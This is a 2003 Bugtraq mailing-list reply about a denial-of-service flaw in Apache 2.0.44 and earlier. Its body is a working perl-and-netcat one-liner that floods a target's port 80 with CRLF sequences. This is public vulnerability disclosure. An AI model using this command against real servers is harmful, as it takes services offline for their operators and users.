
Date: Fri, 11 Apr 2003 11:52:46 +0100
From: Paul Johnston <paul@...tpoint.ltd.uk>
To: bugtraq@...urityfocus.com
Subject: Re: working apache <= 2.0.44 DoS exploit for linux.


The exploit is trivial with perl and netcat:

perl -e 'print "\r\n" x 4000000' | nc <target> 80


Daniel Nyström wrote:

>Exploit attached. 
>
>No replys to this e-mail adress plz.
>
>  
>
-- 
Paul Johnston
Internet Security Specialist
Westpoint Limited
Albion Wharf, 19 Albion Street,
Manchester, M1 5LN
England
Tel: +44 (0)161 237 1028
Fax: +44 (0)161 237 1031
email: paul@...tpoint.ltd.uk
web: www.westpoint.ltd.uk





